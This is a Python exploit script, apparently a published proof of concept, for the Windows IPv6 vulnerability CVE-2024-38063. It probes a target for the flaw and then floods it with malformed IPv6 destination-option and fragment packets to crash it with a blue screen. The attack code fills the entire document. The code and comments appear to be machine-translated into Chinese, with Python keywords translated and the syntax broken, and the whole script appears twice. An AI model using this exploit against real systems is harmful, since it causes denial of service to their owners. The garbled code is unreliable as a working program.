#!/usr/bin/env Python3
# - * - 编码: UTF-8 - * -
#利用标题: Windows IPv6 CVE-2024-38063检查器和拒绝服务
#日期: 2024-08-07
#利用作者:光速率
#供应商homepage: https://microsoft.com
#供应商Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/cve-2024-38063
#版本: Windows 10,11 10.0.26100.1457和Server 2016-2019-2022 10.0.17763.6189
#在: Windows 11 23H2和Windows Server 2022测试
#CVE: CVE-2024-38063
导入OS,子过程,RE,时间,系统
##变量
SDSTIP='FE80:3:78B733:62833:49AD3:C565'##占位符
如果len(sys.argv)1: sdstip=sys.argv [1] ##请提供一个参数
SDSTMAC='00:0C:29333333333:E1:C8'##不需要,将尝试通过邻居发现获得Mac
iBatches=20
icorruptions=20 ##我们想损坏tcpip.sys内存多少次
TRY:
打印('---加载Scapy,可能需要一些时间.')
从scapy.config进口conf
conf.ipv6_enabled=false
进口scapy。
scapy.conf.verb=0
Except:
打印(“加载Scapy时出错,请运行“ PIP install scapy'')
出口(1)
导入记录
logging.getLogger('scapy.runtime')。setlevel(logging.error)
def selectInterface(): #adapter []=npfdevice,ip,mac
def getallInterfaces():
lstinterfaces=[]
如果os.name=='nt':
proc=subprocess.popen('getmac /nh /v /fo csv | findstr /v /i断开连接',shell=true,stdout=subprocess.pipe)
对于proc.stdout.readlines():中的binterface
lstint=binterface.split(b',')
sadapter=lstint [0] .Strip(b''')。decode()
sdeviceName=lstint [1] .Strip(b''')。decode()
smac=lstint [2] .Strip(b''')。decode()。下()。替换(' - ',':')
swinguid=lStint [3] .Strip()。strip(b''')。decode()[-38:]
proc=subprocess.popen('netsh int ipv6 show addr'{}'| findstr /i address'.format(sadapter),shell=true,stdout=subprocess.pipe)
try: sip=re.findall(r'[\ w:] +:+[\ w:]+',proc.stdout.readlines()[0] .strip().strip()。decode()。decode()。
exceve: sip=''
如果len(smac)==17: lstinterfaces.append([[SADAPTER,SIP,SMAC,SDEVICENAME,SWINEDENAME,SWINEIDID]))
其他:
proc=subprocess.Popen('for i in $(ip address | grep -v 'lo' | grep 'default' | cut -d':' -f2 | cut -d' ' -f2);do echo $i $(ip address show dev $i | grep 'inet6 ' | cut -d' ' -f6 | cut -d'/' -f1) $(ip address show dev $i | grep 'ether' | cut -d''-f6);完成',shell=true,stdout=subprocess.pipe)
对于proc.stdout.readlines():中的binterface
lstint=binterface.strip()。split(b'')
TRY:
如果len(lstint [2])==17: lstinterfaces.append([lstint [0] .decode(),lstint [1] .decode(),lstint [2] .decode().decode(),'',',''])))
除:通过
返回lstinterfaces
lstinterfaces=getallInterfaces()
如果Len(Lstinterfaces)1:
i=1
对于lstinterfaces中的lstint: #arrays:适配器,IP,Mac,Windows DeviceName,Windows Guid
print('[{}] {}具有{}({})'。格式(i,lstint [2],lstint [1],lstint [0]))
I +=1
#sanswer=输入('[?]请选择适配器[1] :')
sanswer='3'
else: sanswer=无
如果不是sanswer或sanswer==''或不sanswer.isdigit()或int(sanswer)=i: sanswer=1
ianswer=int(sanswer)-1
SNPF=lstinterfaces [ianswer] [0]
sip=lstinterfaces [ianswer] [1]
smac=lstinterfaces [ianswer] [2]
如果OS.Name=='NT': SNPF=R'\ Device \ npf_' + lstinterfaces [ianswer] [4]
返回(SNPF,SIP,SMAC,LSTINTERFACES [IANSWER] [3])
def get_packets(iid,sdstipv6,sdstmac=none):
ifragid=0xbedead00 + iid
opacket1=scapy.ipv6(fl=1,hlim=64+iid,dst=sdstipv6)/scapy.ipv6exthdrdestopt(options=[scapy.padn(type=0x81,optdata='bad''')])))))))))))))))))))))
opacket2=scapy.ipv6(fl=1,hlim=64+iid,dst=sdstipv6)/scapy.ipv6 exthdrfragment(id=ifragid,m=1,offset=0) /'nortalive''
opacket3=scapy.ipv6(fl=1,hlim=64+iid,dst=sdstipv6)/scapy.ipv6exthdrfragment(id=ifragid,m=0,fortset=1)
如果SDSTMAC: ##应该始终是这个
opacket1=scapy.ether(dst=sdstmac)/opacket1
opacket2=scapy.ether(dst=sdstmac)/opacket2
opacket3=scapy.ether(dst=sdstmac)/opacket3
返回[opacket1,opacket2,opacket3]
def doipv6nd(SDSTIP,SINT): ##尝试通过IPv6邻居Sollicitation获取MAC地址
smacresp=无
OneighBorsollicitation=scapy.ipv6(dst=sdstip)/scapy.icmpv6nd_ns(tgt=sdstip)/scapy.icmpv6ndoptsrclladdr(lladdr='FF:FF3:FF3333:FF333333333333:FF3333333333:FF')
oresponse=scapy.sr1(OneighBorsollication,超时=5,IFACE=SINT)
if oresponse and scapy.icmpv6ndoptdstlladdr in oresponse:
smacresp=oresponse [scapy.icmpv6ndoptdstlladdr] .lladdr
返回smacresp
lstint=selectInterface()## npf,ipv6,mac,name
smac=doipv6nd(sdstip,lstint [0])
如果SMAC:
打印(f'[+] target {sdstip}是可达到的,获得了Mac地址{smac}')
SDSTMAC=SMAC
elif sdstmac!='':
使用提供的Mac {}'。格式(SDSTMAC))print('[ - ]目标不响应邻居的Sollivitation数据包))
其他:
打印('[ - ]没有MAC地址,此漏洞可能无法正常工作')
lstpacketStosend=[]
对于I范围(IBATCHES):
对于J范围(ICRUSTIONS):
lstpacketstosend +=get_packets(j,sdstip,sdstmac) + get_packets(j,sdstip,sdstmac)
##'send'is layer3(让Scapy弄清楚MAC地址),'sendp'是L2(MAC地址填充,好多了)
print('针对IPv6地址{}'。格式(sdstip)验证漏洞)
##验证First:'ICMPV6Paramproblem'
lstresp=scapy.srp1(lstpacketstosend [0],iface=lstint [0],超时=5)
如果lstresp [0]中的lstresp和scapy.ipv6和scapy.ICMPV6Paramproblem in lstresp [0] :
print('[+]是,{}是脆弱的,并为CVE-2024-38063'.format(SDSTIP)探索)
其他:
输入('[ - ]不易受攻击或启用防火墙。请验证并重新运行或按Enter继续执行')
打印('等待10秒钟让目标冷却(更多更好)')
时间。
输入('[?]好的,继续执行拒绝服务(BSOD)?按Ctrl+C现在取消')
########### 开发
print('[+]发送{}数据包通过接口{} {}'。格式(len(lstpacketstosend),lstint [0],lstint [3]))))))
scapy.conf.verb=1
scapy.sendp(lstpacketstosend,iface=lstint [0])
打印('[+]所有数据包都发送,现在需要完全 60秒才能使目标崩溃')
# - * - 编码: UTF-8 - * -
#利用标题: Windows IPv6 CVE-2024-38063检查器和拒绝服务
#日期: 2024-08-07
#利用作者:光速率
#供应商homepage: https://microsoft.com
#供应商Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/cve-2024-38063
#版本: Windows 10,11 10.0.26100.1457和Server 2016-2019-2022 10.0.17763.6189
#在: Windows 11 23H2和Windows Server 2022测试
#CVE: CVE-2024-38063
导入OS,子过程,RE,时间,系统
##变量
SDSTIP='FE80:3:78B733:62833:49AD3:C565'##占位符
如果len(sys.argv)1: sdstip=sys.argv [1] ##请提供一个参数
SDSTMAC='00:0C:29333333333:E1:C8'##不需要,将尝试通过邻居发现获得Mac
iBatches=20
icorruptions=20 ##我们想损坏tcpip.sys内存多少次
TRY:
打印('---加载Scapy,可能需要一些时间.')
从scapy.config进口conf
conf.ipv6_enabled=false
进口scapy。
scapy.conf.verb=0
Except:
打印(“加载Scapy时出错,请运行“ PIP install scapy'')
出口(1)
导入记录
logging.getLogger('scapy.runtime')。setlevel(logging.error)
def selectInterface(): #adapter []=npfdevice,ip,mac
def getallInterfaces():
lstinterfaces=[]
如果os.name=='nt':
proc=subprocess.popen('getmac /nh /v /fo csv | findstr /v /i断开连接',shell=true,stdout=subprocess.pipe)
对于proc.stdout.readlines():中的binterface
lstint=binterface.split(b',')
sadapter=lstint [0] .Strip(b''')。decode()
sdeviceName=lstint [1] .Strip(b''')。decode()
smac=lstint [2] .Strip(b''')。decode()。下()。替换(' - ',':')
swinguid=lStint [3] .Strip()。strip(b''')。decode()[-38:]
proc=subprocess.popen('netsh int ipv6 show addr'{}'| findstr /i address'.format(sadapter),shell=true,stdout=subprocess.pipe)
try: sip=re.findall(r'[\ w:] +:+[\ w:]+',proc.stdout.readlines()[0] .strip().strip()。decode()。decode()。
exceve: sip=''
如果len(smac)==17: lstinterfaces.append([[SADAPTER,SIP,SMAC,SDEVICENAME,SWINEDENAME,SWINEIDID]))
其他:
proc=subprocess.Popen('for i in $(ip address | grep -v 'lo' | grep 'default' | cut -d':' -f2 | cut -d' ' -f2);do echo $i $(ip address show dev $i | grep 'inet6 ' | cut -d' ' -f6 | cut -d'/' -f1) $(ip address show dev $i | grep 'ether' | cut -d''-f6);完成',shell=true,stdout=subprocess.pipe)
对于proc.stdout.readlines():中的binterface
lstint=binterface.strip()。split(b'')
TRY:
如果len(lstint [2])==17: lstinterfaces.append([lstint [0] .decode(),lstint [1] .decode(),lstint [2] .decode().decode(),'',',''])))
除:通过
返回lstinterfaces
lstinterfaces=getallInterfaces()
如果Len(Lstinterfaces)1:
i=1
对于lstinterfaces中的lstint: #arrays:适配器,IP,Mac,Windows DeviceName,Windows Guid
print('[{}] {}具有{}({})'。格式(i,lstint [2],lstint [1],lstint [0]))
I +=1
#sanswer=输入('[?]请选择适配器[1] :')
sanswer='3'
else: sanswer=无
如果不是sanswer或sanswer==''或不sanswer.isdigit()或int(sanswer)=i: sanswer=1
ianswer=int(sanswer)-1
SNPF=lstinterfaces [ianswer] [0]
sip=lstinterfaces [ianswer] [1]
smac=lstinterfaces [ianswer] [2]
如果OS.Name=='NT': SNPF=R'\ Device \ npf_' + lstinterfaces [ianswer] [4]
返回(SNPF,SIP,SMAC,LSTINTERFACES [IANSWER] [3])
def get_packets(iid,sdstipv6,sdstmac=none):
ifragid=0xbedead00 + iid
opacket1=scapy.ipv6(fl=1,hlim=64+iid,dst=sdstipv6)/scapy.ipv6exthdrdestopt(options=[scapy.padn(type=0x81,optdata='bad''')])))))))))))))))))))))
opacket2=scapy.ipv6(fl=1,hlim=64+iid,dst=sdstipv6)/scapy.ipv6 exthdrfragment(id=ifragid,m=1,offset=0) /'nortalive''
opacket3=scapy.ipv6(fl=1,hlim=64+iid,dst=sdstipv6)/scapy.ipv6exthdrfragment(id=ifragid,m=0,fortset=1)
如果SDSTMAC: ##应该始终是这个
opacket1=scapy.ether(dst=sdstmac)/opacket1
opacket2=scapy.ether(dst=sdstmac)/opacket2
opacket3=scapy.ether(dst=sdstmac)/opacket3
返回[opacket1,opacket2,opacket3]
def doipv6nd(SDSTIP,SINT): ##尝试通过IPv6邻居Sollicitation获取MAC地址
smacresp=无
OneighBorsollicitation=scapy.ipv6(dst=sdstip)/scapy.icmpv6nd_ns(tgt=sdstip)/scapy.icmpv6ndoptsrclladdr(lladdr='FF:FF3:FF3333:FF333333333333:FF3333333333:FF')
oresponse=scapy.sr1(OneighBorsollication,超时=5,IFACE=SINT)
if oresponse and scapy.icmpv6ndoptdstlladdr in oresponse:
smacresp=oresponse [scapy.icmpv6ndoptdstlladdr] .lladdr
返回smacresp
lstint=selectInterface()## npf,ipv6,mac,name
smac=doipv6nd(sdstip,lstint [0])
如果SMAC:
打印(f'[+] target {sdstip}是可达到的,获得了Mac地址{smac}')
SDSTMAC=SMAC
elif sdstmac!='':
使用提供的Mac {}'。格式(SDSTMAC))print('[ - ]目标不响应邻居的Sollivitation数据包))
其他:
打印('[ - ]没有MAC地址,此漏洞可能无法正常工作')
lstpacketStosend=[]
对于I范围(IBATCHES):
对于J范围(ICRUSTIONS):
lstpacketstosend +=get_packets(j,sdstip,sdstmac) + get_packets(j,sdstip,sdstmac)
##'send'is layer3(让Scapy弄清楚MAC地址),'sendp'是L2(MAC地址填充,好多了)
print('针对IPv6地址{}'。格式(sdstip)验证漏洞)
##验证First:'ICMPV6Paramproblem'
lstresp=scapy.srp1(lstpacketstosend [0],iface=lstint [0],超时=5)
如果lstresp [0]中的lstresp和scapy.ipv6和scapy.ICMPV6Paramproblem in lstresp [0] :
print('[+]是,{}是脆弱的,并为CVE-2024-38063'.format(SDSTIP)探索)
其他:
输入('[ - ]不易受攻击或启用防火墙。请验证并重新运行或按Enter继续执行')
打印('等待10秒钟让目标冷却(更多更好)')
时间。
输入('[?]好的,继续执行拒绝服务(BSOD)?按Ctrl+C现在取消')
########### 开发
print('[+]发送{}数据包通过接口{} {}'。格式(len(lstpacketstosend),lstint [0],lstint [3]))))))
scapy.conf.verb=1
scapy.sendp(lstpacketstosend,iface=lstint [0])
打印('[+]所有数据包都发送,现在需要完全 60秒才能使目标崩溃')
